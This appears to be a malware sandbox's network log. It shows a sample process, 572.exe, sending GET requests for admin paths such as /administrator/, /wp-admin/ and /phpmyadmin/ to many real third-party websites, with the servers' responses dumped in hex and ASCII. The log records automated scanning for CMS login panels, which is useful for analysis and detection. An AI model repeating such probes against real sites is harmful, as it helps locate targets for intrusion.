                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566637993 CET206OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.918870926 CET399INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                226192.168.2.6559673.134.125.17580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.677671909 CET190OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.801002979 CET328INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: f24e88897525028b0fd80ce8076416da
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 85
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/phpmyadmin/">Temporary Redirect</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                227192.168.2.655101172.66.41.2080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.684639931 CET177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: yellosa.co.za
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.811126947 CET665INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://yellosa.co.za/administrator/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CYxbFgPEarkqJIFgrkibREWr2BFoh%2B9uxRTVbuL14uzawQhNYdiT4v8JXPmKBbe8rKA4mHemftEK1vg1rn4xsOdtk9uxTNsJ57aCPmqmktHEm%2F1vxLBhvEOmLssQhJgM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7159d6244c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.144879103 CET186OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: yellosa.co.za
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.273452997 CET678INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://yellosa.co.za/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=osISNzAUlZCo2ZshEYrfXwV0Jzku6j%2FxDRQ%2F3JvUyF2e2Ud2vseg2lkXi2DRazAzdCQ8%2FpvZHoiBFWfFz1CmtqDgzwBgBBGpyIqmNY8q1BarnftzYr5vPV1F9N%2FDJASj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42baab244c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                228192.168.2.656060192.185.5.2380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.705586910 CET234OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://multiideas.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.809197903 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                229192.168.2.65565431.216.144.580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.706136942 CET171OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.907372952 CET195INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.308068037 CET180OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.509330988 CET160INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                230192.168.2.655790162.241.203.3080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.706142902 CET234OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://nossoplayer.me/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.814596891 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                231192.168.2.655653163.247.44.23980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.706393003 CET189OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.971647024 CET126INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://mitextoescolar.mineduc.cl/administrator/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                232192.168.2.655702181.4.228.15580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.706656933 CET186OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.975220919 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.975239038 CET151INData Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                233192.168.2.655650178.16.128.18180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.706717968 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.900787115 CET1019INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 707
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://mobilsam.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                234192.168.2.65565177.240.114.21280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
